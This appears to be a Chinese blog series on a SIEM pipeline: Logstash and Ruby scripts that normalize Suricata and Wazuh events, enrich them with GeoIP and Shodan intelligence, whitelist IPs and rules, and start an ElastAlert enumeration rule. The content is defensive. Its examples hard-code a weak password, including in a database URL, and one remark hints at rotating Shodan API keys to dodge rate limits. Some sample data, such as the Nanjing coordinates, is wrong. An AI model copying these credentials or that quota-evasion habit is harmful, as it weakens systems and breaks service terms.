​ 当Suricata设置dump-all-headers:both时,会将HTTP头全部输出。对于http_audit这个需求而言是个很好的功能,只不过输出的格式有点坑😂😂😂。为了更方便的在Kibana上进行筛选,我对这部分数据进行了标准化。😁

Logstash Config
1
2
3
4
5
6
7
filter {
if [suricata][eve][http] {
ruby {
path => "/etc/logstash/scripts/normalized_http_headers.rb"
}
}
}
Ruby Code
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
def filter(event)
request = {}
response = {}

request_headers = event.get("[suricata][eve][http][request_headers]")
response_headers = event.get("[suricata][eve][http][response_headers]")

if request_headers then
request_headers.each do |headers|
name = headers['name'].downcase
value = headers['value']
request[name] = value
end
end

if response_headers then
response_headers.each do |headers|
name = headers['name'].downcase
value = headers['value']
response[name] = value
end
end

event.remove("[suricata][eve][http][request_headers]")
event.remove("[suricata][eve][http][response_headers]")
event.set("[suricata][eve][http][request]", request)
event.set("[suricata][eve][http][response]", response)
return [event]
end
示例
  • 标准化之前的数据:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
{
"request_headers": [
{
"name": "Connection",
"value": "Keep-Alive"
}
],
"response_headers": [
{
"name": "Server",
"value": "NWS_TCloud_S11"
}
]
}
  • 标准化之后的数据:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
{
"http": {
"request": {
"host": "192.168.199.1:25782",
"connection": "Close",
"cache-control": "no-cache",
"pragma": "no-cache",
"user-agent": "Microsoft-Windows/10.0 UPnP/1.0",
"accept": "text/xml, application/xml"
},
"response": {
"ext": "",
"content-length": "2645",
"server": "RT-N56U/3.4.3.9 UPnP/1.1 MiniUPnPd/2.0",
"content-type": "text/xml; charset=\"utf-8\"",
"connection": "close"
}
}
}

1.1.7 normalized-tls_for_suricata
Logstash Config
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
filter {
if [suricata][eve][tls] {
mutate {
uppercase => [
"[tls][server][hash][sha1]"
]
split => {
"[tls][server][hash][sha1]" => ":"
}
join => {
"[tls][server][hash][sha1]" => ""
}
copy => {
"[tls][server][hash][sha1]" => "[related][hash]"
}
}
}
}

1.2 normalized-alarm_from_siem

​ 针对alarm事件进行标准化,也就是SIEM发出的数据。参考上图中红色线所示部分

1.2.1 normalized-alarm

​ 通用alarm事件标准化配置。

Logstash Config
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
filter {
date {
match => ["timestamp", "ISO8601"]
target => "timestamp"
}

mutate {
rename => {
"[data][source]" => "source"
"[data][destination]" => "destination"
"[data][network]" => "network"

"[data][event]" => "event"
"[data][fileset]" => "fileset"

"[data][http]" => "http"
"[data][url]" => "url"
"[data][user_agent]" => "user_agent"

"[data][related]" => "related"
"[data][threat]" => "threat"

"[rule][groups]" => "[rule][ruleset]"
}

convert => {
#"[agent][id]" => "integer"

"[event][severity]" => "integer"

"[rule][id]" => "integer"

"[related][rule][id]" => "integer"

"[network][bytes]" => "integer"
"[network][packets]" => "integer"

"[source][port]" => "integer"
"[source][bytes]" => "integer"
"[source][packets]" => "integer"

"[destination][port]" => "integer"
"[destination][bytes]" => "integer"
"[destination][packets]" => "integer"

"[http][response][status_code]" => "integer"
"[http][response][body][bytes]" => "integer"
}

remove_field => [
"beat", "input_type", "tags", "count", "@version",
"ecs", "log", "offset", "type", "host", "predecoder",
"decoder", "[data][rule]"
]

copy => {
"[rule][description]" => "[rule][name]"
}
}

if [event][kind] == "alarm" {
mutate {
rename => {
"previous_output" => "[related][event][log]"
}
}

ruby {
code => "
src_ip = event.get('[source][ip]')
dst_ip = event.get('[destination][ip]')
src_port = event.get('[source][port]').to_s
dst_port = event.get('[destination][port]').to_s
rule_name = event.get('[related][rule][name]')[0].to_s

rule_description = src_ip + ':' + src_port + ' -> ' + dst_ip + ':' + dst_port + ' -> ' + rule_name
event.set('[rule][description]', rule_description)

if event.get('[related][rule][id]') then
sid = event.get('[related][rule][id]')[0]
event.set('[rule][uuid]', sid)
end

event.set('[rule][category]', 'Frequency')
"
}
}
}

2. Enrichment

image-20201208110506481


2.1 enrichment_alert_to_siem

​ 针对alert事件进行丰富化,也就是安全设备发出的原始安全事件。参考上图中蓝色线所示部分

2.1.1 enrichment-alert_direction_for_suricata

​ 由于一些特殊原因,我不得不将suricata.yaml配置文件中的EXTERNAL_NET = any。这也导致了部分Suricata告警的误报,毕竟放开了规则的方向这个收敛条件。所以,我利用了Logstash 在数据入库到SIEM之前做了一层过滤。

Logstash Config
1
2
3
4
5
6
7
filter {
if [rule][description] {
ruby {
path => "/etc/logstash/scripts/add_direction.rb"
}
}
}
Ruby Code
  • enrichment-alert_direction_for_suricata.rb
    • 过滤触发规则的IP与规则方向不匹配的安全事件
    • 增加方向与区域的字段,便于分析人员第一时间识别内对内以及内对外的告警。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
require "ipaddr"


def filter(event)
src_ip = event.get("[source][ip]")
dst_ip = event.get("[destination][ip]")
if not src_ip or not dst_ip then
event.cancel
return []
end
ipaddr_src = IPAddr.new src_ip
ipaddr_dst = IPAddr.new dst_ip

# Sample: alert http $EXTERNAL_NET any -> $HOME_NET any
rule = event.get("[rule][description]")
src_direction = rule.split(" ")[2]
dst_direction = rule.split(" ")[5]

src_private = ipaddr_src.private?()
dst_private = ipaddr_dst.private?()

if event.get("provider") == "Suricata" then
if ( src_private ) and ( src_direction == "$EXTERNAL_NET" ) then
event.cancel
return []
end

if ( dst_private ) and ( dst_direction == "$EXTERNAL_NET" ) then
event.cancel
return []
end
end

if src_private and dst_private then
direction = "outbound"
zone = "internal"
elsif src_private and not dst_private then
direction = "outbound"
zone = "internal"
elsif not src_private and dst_private then
direction = "inbound"
zone = "external"
else
direction = "inbound"
zone = "external"
end

event.set("[network][direction]", direction)
event.set("[network][zone]", zone)
return [event]
end

​ 为了便于后期做关联分析,增加了攻击者与域名的关联字段。

Logstash Config
1
2
3
4
5
6
7
8
9
10
11
filter {
if [url][domain] {
ruby {
code => "
source_ip = event.get('[source][ip]')
url_domain = event.get('[url][domain]')
event.set('[related][domain]', [source_ip, url_domain])
"
}
}
}

2.1.3 add_geo-private_ip

​ 为内网IP增加地理位置标示,主要是为了Dashboard展示的时候可以看到资产在地图上的坐标。地图炮?BIUBIUBIU?😂。由于不是外网IP没办法加载GeoIP进行匹配,这里使用了Translate这个插件来进行配置。

Logstash Conifg
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
filter {
translate {
regex => true
exact => true
dictionary_path => "/etc/logstash/scripts/private_ip_geo.yml"
field => "[source][ip]"
destination => "translation_geo"
}

json {
source => "translation_geo"
target => "[source][geo]"
skip_on_invalid_json => true
}

translate {
regex => true
exact => true
dictionary_path => "/etc/logstash/scripts/private_ip_asn.yml"
field => "[source][ip]"
destination => "translation_as"
}

json {
source => "translation_as"
target => "[source][as]"
skip_on_invalid_json => true
}

mutate {
remove_field => [ "translation_geo", "translation_as" ]
}
}

filter {
translate {
regex => true
exact => true
dictionary_path => "/etc/logstash/scripts/private_ip_geo.yml"
field => "[destination][ip]"
destination => "translation_geo"
}

json {
source => "translation_geo"
target => "[destination][geo]"
skip_on_invalid_json => true
}

translate {
regex => true
exact => true
dictionary_path => "/etc/logstash/scripts/private_ip_asn.yml"
field => "[destination][ip]"
destination => "translation_as"
}

json {
source => "translation_as"
target => "[destination][as]"
skip_on_invalid_json => true
}

mutate {
remove_field => [ "translation_geo", "translation_as" ]
}
}
Yaml
1
'192.168.199.\d+': '{"location":{"lat":45.8491,"lon":-119.7143},"country_name":"China","country_iso_code":"CN","region_name":"Jiangsu","region_iso_code":"JS","city_name":"Nanjing"}'
1
'192.168.199.\d+': '{"number":4134,"organization.name":"CHINANET-BACKBONE"}'
示例

image-20201209110617996

image-20201208153642680


2.1.4 add_geo-public_ip

​ 外网IP就比较好搞定了直接加载GeoIP数据即可。

Logstash Conifg
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
filter {
if ! [source][geo] {
geoip {
source => "[source][ip]"
target => "[source][geo]"
fields => ["city_name", "country_name", "country_code2", "region_name", "region_code", "location"]
database => "/etc/logstash/GeoLite2-City.mmdb"
}

geoip {
source => "[source][ip]"
target => "[source][as]"
fields => ["autonomous_system_organization", "autonomous_system_number"]
database => "/etc/logstash/GeoLite2-ASN.mmdb"
default_database_type => "ASN"
}
}
}

filter {
if ! [destination][geo] {
geoip {
source => "[destination][ip]"
target => "[destination][geo]"
fields => ["city_name", "country_name", "country_code2", "region_name", "region_code", "location"]
database => "/etc/logstash/GeoLite2-City.mmdb"
}

geoip {
source => "[destination][ip]"
target => "[destination][as]"
fields => ["autonomous_system_organization", "autonomous_system_number"]
database => "/etc/logstash/GeoLite2-ASN.mmdb"
default_database_type => "ASN"
}
}
}

filter {
mutate {
rename => ["[source][geo][country_code2]", "[source][geo][country_iso_code]"]
rename => ["[source][geo][region_code]", "[source][geo][region_iso_code]"]
rename => ["[source][as][asn]", "[source][as][number]"]
rename => ["[source][as][as_org]", "[source][as][organization.name]"]
rename => ["[destination][geo][country_code2]", "[destination][geo][country_iso_code]"]
rename => ["[destination][geo][region_code]", "[destination][geo][region_iso_code]"]
rename => ["[destination][as][asn]", "[destination][as][number]"]
rename => ["[destination][as][as_org]", "[destination][as][organization.name]"]

remove_tag => [ "_geoip_lookup_failure" ]
}
}

2.2 enrichment-alarm_from_siem

​ 针对alarm事件进行丰富化,也就是SIEM发出的数据。上图中红色线所示部分

​ 为SIEM告警增加了Hunting的功能,通过该功能可直接溯源到触发alarm的所有alert事件。

Logstash Config
1
2
3
4
5
6
7
filter {
if [event][kind] == "alarm" and [related][event][log] {
ruby {
path => "/etc/logstash/scripts/add_related_event_id.rb"
}
}
}
Ruby Code
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
require "json"


def register(params)
@pattern = /(?:\\n)?\w+ \d+ \d+:\d+:\d+ logstash NORMALIZED\[-\]: /
end

def filter(event)
event_id = []
rule_id = []
rule_name = []
event_log = event.get('[related][event][log]')

atomic_rules = event_log.split(@pattern)[1 .. -1]
for atomic in atomic_rules do
e_id = JSON.parse(atomic)['event']['id']
r_id = JSON.parse(atomic)['rule']['id']
r_name = JSON.parse(atomic)['rule']['name']

event_id.push(e_id)
rule_id.push(r_id)
rule_name.push(r_name)
end
event.set('[related][event][id]', event_id)
event.set('[related][rule][id]', rule_id)
event.set('[related][rule][name]', rule_name)
event.remove('[related][event][log]')

return [event]
end
示例

​ 以下是一个Wazuh聚合告警,分析人员通过点击threat.hunting.event.id字段即可溯源出触发该聚合规则的底层alert事件。

image-20201204175051910

image-20201204175244182


3. Threat Intelligence

threat-intelligence

3.1 threatIntel_alert_to_siem

​ 通过Logstash加载Ruby脚本,将IoC推送至Redis。为了避免重复推送,每个IoC都会设置超时时间(默认7天)。如上图中蓝色线所示部分;

3.1.1 add-ti_shodan

​ 对于攻击过我们的IP地址我们都会利用Shodan进行反向探测,收集一波攻击者(肉鸡)的资产信息,留给后面分析人员用。由于已经设置了IoC超时时间,所以在超时之前IoC不会重复推送。当然,单个Key调用API频率还是要控制一下的,不过你可以选择多个Key哦。你懂的😈😈😈

Logstash Config
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
filter {
if [suricata][eve][alert] {
clone {
clones => [ "siem_events" ]
}
}
}

filter {
if [type] == "siem_events" {
ruby {
path => "/etc/logstash/scripts/siem-ti_shodan.rb"
script_params => {
"host" => "127.0.0.1"
"port" => 6379
"password" => "HelloWorld"

"ti_db" => 1
"alert_prefix" => "alert:"
"expire" => 86400

"spider_db" => 5
"spider_key" => "spider:shodan:ioc"
}
}
}
}
Ruby Code
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
require "json"
require "redis"
require "ipaddr"

def register(params)
@expire = params["expire"]
@alert = params["alert_prefix"]
@alarm = params["alarm_prefix"]
@spider_key = params["spider_key"]

# connect to redis
@ti_redis = Redis.new(host:params["host"], port:params["port"], password:params["password"], db:params["ti_db"])
@spider_redis = Redis.new(host:params["host"], port:params["port"], password:params["password"], db:params["spider_db"])
end

def filter(event)
src_ip = event.get("[source][ip]")
dst_ip = event.get("[destination][ip]")

begin
ipaddr_src = IPAddr.new src_ip
ipaddr_dst = IPAddr.new dst_ip
rescue Exception => e
event.cancel
return []
end

if not ipaddr_src.private?() then
ioc = src_ip
elsif not ipaddr_dst.private?() then
ioc = dst_ip
else
return [event]
end

if event.get("[event][kind]") == "alert" then
alert_ioc = @alert + ioc
if not @ti_redis.exists?(alert_ioc) then
@ti_redis.setex(alert_ioc, @expire, true)
@spider_redis.lpush(@spider_key, ioc)
end
end

return [event]
end

3.2 threatIntel_alarm_from_siem

​ 通过Logstash进行威胁情报数据的丰富化。如上图中红色线所示部分;

3.2.1 add-ti_tags_from_shodan

​ 将Shodan IoC情报数据丰富化至alarm。

Logstash Config
1
2
3
4
5
6
7
8
9
10
11
12
13
14
filter {
if [event][kind] == "alarm" {
ruby {
path => "/etc/logstash/scripts/ti_shodan.rb"
script_params => {
"host" => "127.0.0.1"
"port" => 6379
"password" => "HelloWorld"
"ti_db" => 1
"alarm_prefix" => "alarm:"
}
}
}
}
Ruby Code
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
require "json"
require "redis"
require "ipaddr"

def register(params)
@alarm = params["alarm_prefix"]
# connect to redis
@ti_redis = Redis.new(host:params["host"], port:params["port"], password:params["password"], db:params["ti_db"])
end

def filter(event)
src_ip = event.get("[source][ip]")
dst_ip = event.get("[destination][ip]")

begin
ipaddr_src = IPAddr.new src_ip
ipaddr_dst = IPAddr.new dst_ip
rescue Exception => e
event.cancel
return []
end

if not ipaddr_src.private?() then
ioc = src_ip
elsif not ipaddr_dst.private?() then
ioc = dst_ip
else
return [event]
end

raw_data = @ti_redis.get(@alarm + ioc)
if raw_data then
data = JSON.parse(raw_data)
if data then
event.set("[threat][hunting][services]", data["services"])
event.set("[threat][hunting][vulns]", data["vulns"])
event.set("[threat][hunting][ports]", data["ports"])
event.set("[threat][hunting][hostnames]", data["hostnames"])
event.set("[threat][hunting][domains]", data["domains"])
if data["details"] then
details = data["details"].to_json
event.set("[threat][hunting][details]", details)
end
end
end

return [event]
end
示例
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
{
"threat": {
"hunting": {
"vulns": [
"CVE-2019-0220",
"CVE-2019-0197",
"CVE-2019-0196",
"CVE-2018-1302",
"CVE-2019-0211",
"CVE-2017-15710",
"CVE-2018-1301",
"CVE-2018-1283",
"CVE-2018-1303",
"CVE-2017-15715",
"CVE-2018-1333",
"CVE-2018-17199",
"CVE-2018-11763",
"CVE-2018-1312"
],
"domains": [],
"ports": [
8888,
80,
8080,
8090,
22
],
"details": "{\"tcp\":[{\"http-simple-new\":8888,\"Apache httpd\":\"2.4.29\"},{\"http\":80,\"Apache httpd\":\"2.4.29\"},{\"http\":8080,\"Apache httpd\":\"2.4.29\"},{\"http-simple-new\":8090},{\"ssh\":22,\"OpenSSH\":\"7.6p1 Ubuntu-4ubuntu0.3\"}],\"udp\":[]}",
"hostnames": [],
"services": [
"http-simple-new",
"ssh",
"http"
]
}
}
}

image-20201205151011258

image-20201205150744102

3.2.2 add-ti_tags

​ 这部分通常是对接的自有情报(我们会收集攻击过我们的IP,建立适用于自己的内部情报。)以及开源情报。原则上SIEM产生的alarm事件并不会很多,所以这边直接从Elastic获取了情报数据进行告警的丰富化。如果alarm事件很多的话,建议也是放在Redis或者再考虑其他方案。近期准备采购商业情报,后期将会有一个商业情报的对接过程。

Logstash Config
1
2
3
4
5
6
7
8
9
10
11
12
filter {
if [event][kind] == "alarm" {
ruby {
path => "/etc/logstash/scripts/siem-ti_tags.rb"
script_params => {
"index" => "ecs-ti-*"
"urls" => "https://elastic:HelloWorld@127.0.0.1:9200"
"ca" => "ca.crt"
}
}
}
}
Ruby Code
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
require 'json'
require 'elasticsearch'

def register(params)
@urls = params["urls"]
@index = params["index"]
@ca = params["ca"]
@client = Elasticsearch::Client.new urls: @urls, transport_options: { ssl: { ca_file: @ca } }
end

def filter(event)
ioc = event.get('[source][ip]')
query = {
"_source": {
"includes": [
"threat.tags",
"threat.provider"
]
},
"query": {
"bool": {
"must": [
{
"terms": {
"threat.type": [
"ipv4",
"ip"
]
}
},
{
"term": {
"threat.ioc": ioc
}
}
],
"filter": [
{
"range": {
"threat.creation_time": {
"gte": "now-7d"
}
}
}
]
}
},
"size": 10
}
response = @client.search index: @index, body: query.to_json

tags = []
providers = []
if not response['hits']['hits'].empty? then
response['hits']['hits'].each do |result|
if not providers.include?(result["_source"]["threat"]["provider"])
providers.push(result["_source"]["threat"]["provider"])
end
tags = tags - result["_source"]["threat"]["tags"]
tags = tags + result["_source"]["threat"]["tags"]
end
end

event.set('[threat][intelligence][tags]', tags)
event.set('[threat][intelligence][providers]', providers)
return [event]
end
示例

image-20201208144650226

1
2
3
4
5
6
7
8
9
10
11
12
{
"threat": {
"intelligence": {
"providers": [
"NTA"
],
"tags": [
"WebAttack"
]
}
}
}

4. Filter

image-20201207153152332

4.1 alert_to_siem

4.1.1 filter_ip_from_alert

​ 实际使用场景中需要对一些白名单IP、特定签名规则进行过滤。这么做也是为了保证SIEM的性能以及告警的可靠性。这部分数据依旧会发送到Elastic作为历史数据留存,但不会被SIEM消费并产生告警。

Logstash Config

​ 利用Clone插件,将需要被SIEM消费的数据经由脚本过滤。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
filter {
if [suricata][eve][alert] {
clone {
clones => [ "siem_events" ]
}
}
}

filter {
if [type] == "siem_events" {
ruby {
path => "/etc/logstash/scripts/siem-filter_ip.rb"
script_params => {
"host" => "127.0.0.1"
"port" => 6379
"password" => "HelloWorld"
"cdn_db" => 3
"scan_db" => 4
}
}
}
}
Ruby Code
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
require "redis"


def register(params)
begin
@cdn_db = Redis.new(host:params["host"], port:params["port"], password:params["password"], db:params["cdn_db"])
@scan_db = Redis.new(host:params["host"], port:params["port"], password:params["password"], db:params["scan_db"])
rescue
return
end
end

def filter(event)
src_ip = event.get("[source][ip]")
dst_ip = event.get("[destination][ip]")

if @cdn_db.exists?(src_ip) || @cdn_db.exists?(dst_ip) || @scan_db.exists?(src_ip) || @scan_db.exists?(dst_ip) then
event.cancel
return []
end

return [event]
end
4.1.2 filter_sid_from_alert
Logstash Config
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
filter {
if [suricata][eve][alert] {
clone {
clones => [ "siem_events" ]
}
}
}

filter {
if [type] == "siem_events" {
ruby {
path => "/etc/logstash/scripts/siem-filter_sid.rb"
script_params => {
"host" => "127.0.0.1"
"port" => 6379
"password" => "HelloWorld"
"sid_db" => 2
}
}
}
}
Ruby Code
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
require "redis"


def register(params)
@signature_id = Redis.new(host:params["host"], port:params["port"], password:params["password"], db:params["sid_db"])
end

def filter(event)
sid = event.get("[rule][id]")
if @signature_id.exists?(sid) then
event.cancel
return []
end
return [event]
end

4.2 alarm_from_siem

4.2.1 update_action_from_alarm

​ 更新匹配到的rule.id事件,将event.action值更新为:block。便于后期被SIEM联动模块“消费”。如上图中红色线所示部分。主要是为了通过event.action字段来区分SIEM做的自动化操作。

Logstash Config

​ 针对指定rule.id事件,将allowed值更新为:block。便于后期被联动模块“消费”。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
filter {
mutate {
update => {
"[event][action]" => "allowed"
}
}

ruby {
path => "/etc/logstash/scripts/siem-update_action.rb"
script_params => {
"host" => "127.0.0.1"
"port" => 6379
"password" => "HelloWorld"
"siem_action_db" => 7
}
}
}
Ruby Code
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
require "redis"


def register(params)
begin
@siem_action_db = Redis.new(host:params["host"], port:params["port"], password:params["password"], db:params["siem_action_db"])
rescue
return
end
end


def filter(event)
rule_id = event.get("[rule][id]")

if @siem_action_db.exists?(rule_id) then
event.set("[event][action]", "block")
end

return [event]
end
示例:

image-20201207111416997


3. 仪表盘

SIEM的告警仪表盘

SIEM-Alarm

安全事件仪表盘 (安全溯源)

SIEM Alert

敏感接口监控

image-20201214112856076

背景

XXX


SIEM v0.2 的不足

XXX


SIEM v0.3 的改进

1. Workflow

XXX


2. Normalized

Workflow

![image-20220218183243830](/Users/canon/Library/Application Support/typora-user-images/image-20220218183243830.png)

Configure

No File Script Log Note
1 60_normalized-general.conf
2 61_normalized-alert.conf
3 62_normalized-flow.conf
4 63_normalized-fileinfo.conf
5 64_normalized-http.conf 64_normalized-http.rb 64_normalized-http.log
6 65_normalized-tls.conf

3. Enrichment

Workflow

![image-20220221134544143](/Users/canon/Library/Application Support/typora-user-images/image-20220221134544143.png)

Configure

No File Script Log Note
1 70_enrichment-general-geo-1-private_ip.conf
2 70_enrichment-general-geo-2-public_ip.conf
3 71_enrichment-alert-1-direction.conf 71_enrichment-alert-1-direction.rb
4 71_enrichment-alert-2-killChain.conf 71_enrichment-alert-2-killChain.rb 71_enrichment-alert-2-killChain.log
5 71_enrichment-alert-3-cve.conf 71_enrichment-alert-3-cve.rb 71_enrichment-alert-3-cve.log
6 71_enrichment-alert-4-whitelist_ip.conf 71_enrichment-alert-4-whitelist_ip.rb 71_enrichment-alert-4-whitelist_ip.log ****

KillChain

Suricata

Imput

  • Redis template
1
2
3
4
# key: str killchain:{provider}:{rule id}
# value: json str {"steps"=>{KillChain steps}, "description"=>{KillChain description}, "class"=>{rule class}}

localhost:6379> set killchain:suricata:2028933 '{"steps": 4, "description": "Exploitation", "class"=>exploit}'

Output

1
2
3
4
5
6
7
8
9
{
"threat": {
"killchain": {
"steps": 1,
"description": "侦查跟踪",
"class": "scan"
}
}
}
Imperva

Vulnerability

Input

  • Redis template
1
2
3
4
# key: str enrichment:{class}:{cve}
# value: str {create time create user}

localhost:6379> set enrichment:cve:CVE-2016-8618 '2022-02-16 Canon'

Output

1
2
3
4
5
6
7
8
9
{
"rule": {
"cve": "CVE-2015-9381" // none
},
"vulnerability": {
"id": "CVE-2015-9381",
"enumeration": "CVE"
}
}

4. ThreatIntel

Workflow

![image-20220221105601713](/Users/canon/Library/Application Support/typora-user-images/image-20220221105601713.png)

Configure

Shodan

No File Script Log Note
1 85_threatintel-siem-event-1-shodan.conf 85_threatintel-siem-event-1-shodan.rb

Input

  • Redis template
1
2
3
4
5
# key: list spider:{provider}:ioc
# value: str ioc

localhost:6379> LPUSH spider:shodan:ioc 8.8.8.8 # Spider Queue
localhost:6379> SETEX alert:8.8.8.8 86400 true # IoC Cache

Output

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
{
"source": {
"ip": "84.17.52.20"
},
"threat": {
"hunting": {
"details": {
"tcp": [
{
"http-simple-new": 81
},
{
"https": 443
},
{
"http-simple-new": 8080
},
{
"https-simple-new": 8081
},
{
"https": 8443
},
{
"https-simple-new": 9002
}
],
"udp": []
},
"domains": "cdn77.com",
"hostnames": "unn-84-17-52-20.cdn77.com",
"ports": [
8443,
8081,
9002,
8080,
81,
443
],
"services": [
"https",
"https-simple-new",
"http-simple-new"
]
}
}
}

3. Filter

3.1 Whitelist

3.1.1 IP

  • Redis template

Input

1
2
3
4
# key: str whitelist:{class}:{ip}
# value: json str {"type": "cdn", "action": "pass|drop"}

localhost:6379> set whitelist:ip:8.8.8.8 '{"type": "cdn", "action": "pass"}'

Output

1
2
3
4
5
6
7
8
9
10
11
{
"source": {
"ip": "x.x.x.x"
},
"whitelist": {
"type": "cdn", // 描述白名单类型,如:CDN、红队测试IP、办公网出口IP
"action": "drop", // drop|pass 事件是否需要进入SIEM消费
"origin": "source" // source|destination 描述实际匹配到白名单来源是"source"还是"destination"
},
"isWhitelist": true // 仅作为筛选条件
}

Differences

  • v0.2
1
2
3
4
5
6
7
8
9
10
11
12
{
"source": {
"ip": "x.x.x.x",
"isWhitelist": true,
"whitelistType": "exit_whitelist"
},
"destination.": {
"ip": "y.y.y.y",
"isWhitelist": true,
"whitelistType": "exit_whitelist"
}
}
  • v0.3
1
2
3
4
5
6
7
8
9
10
11
{
"source": {
"ip": "x.x.x.x"
},
"whitelist": {
"type": "cdn",
"action": "drop",
"origin": "source"
},
"isWhitelist": true
}

3.1.2 Rule

3.1.2.1 SID
  • Redis template

Input

1
2
3
4
# key: str whitelist:{class}:{provider}:{rule id}
# value: str {rule name}

localhost:6379> set whitelist:sid:suricata:2101201 "GPLWEB_SERVER_403_Forbidden"

Workflow

![image-20220224143316558](/Users/canon/Library/Application Support/typora-user-images/image-20220224143316558.png)

Input

  • Redis template
1
2
3
4
5
6
7
# key: str whitelist:{class}:{provider}:{rule name}
# value: str add by {user} {date} {sid} # default

# Suricata
localhost:6379> set "whitelist:rule:suricata:GPLWEB_SERVER_403_Forbidden" "add by Canon 2022.02.24 2101201"
# Imperva
localhost:6379> set "whitelist:rule:imperva:Suspicious Response Code" "add by Canon 2022.02.24"

Workflow

![image-20220224150916372](/Users/canon/Library/Application Support/typora-user-images/image-20220224150916372.png)

背景

​ 由于AWS流量镜像的特殊性,现阶段生产网的架构中只接入了HTTPDNS流量,分别采用了ZeekSuricata对现有流量进行分析与预警。Suricata负责基于签名的特征检测,Zeek负责定制化事件的脚本检测,也算是“各司其职”。近几日,某个业务接口出现了Pindom告警,经过分析发现部分IP尝试对该接口的参数进行遍历。由于遍历参数对应的值设置的都比较大,且后台并未对该参数进行深度的限制,导致了服务器会不断的进行计算,最终导致接口无响应。

需求

  • 检测参数遍历行为;
  • 访问是否存在周期性
  • unique user_agent 统计;
  • threat intelligence 研判;

实现

​ 通过扩展**ElastAlert**告警框架的告警模型,来实现以上需求。

参数遍历
  • 新增规则 - Spider.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
import sys
import json
import redis
import html
import datetime
from multiprocessing import Process, JoinableQueue, Lock, Manager

from elastalert.ruletypes import RuleType
from elastalert.util import elastalert_logger

try:
import pandas as pd
except:
print("Please make sure you have pandas installed. pip install pandas")
sys.exit(0)

try:
from tqdm import tqdm
except:
print("Please make sure you have tqdm module installed. pip install tqdm")
sys.exit(0)


def conn(host='localhost', port=6379, password=None, db=0):
pool = redis.ConnectionPool(host=host, port=port, password=password, db=db)
conn = redis.Redis(connection_pool=pool)
return conn


def put_data(conn, q, data):
with conn.pipeline() as pipe:
for i in data:
pipe.lpush(q, i)
pipe.execute()


class SpiderRule(RuleType):
def __init__(self, rules, args=None):
super(SpiderRule, self).__init__(rules, args=None)
self.MAX_ARGS_LENGTH = int(self.rules['beacon']['max_args_length'])
self.MIN_HITS = int(self.rules['beacon']['min_hits'])
self.MAX_UNIQUE_ARGS = int(self.rules['beacon']['max_unique_args'])
self.THRESHOLD_PERCENT = int(self.rules['beacon']['threshold_percent'])
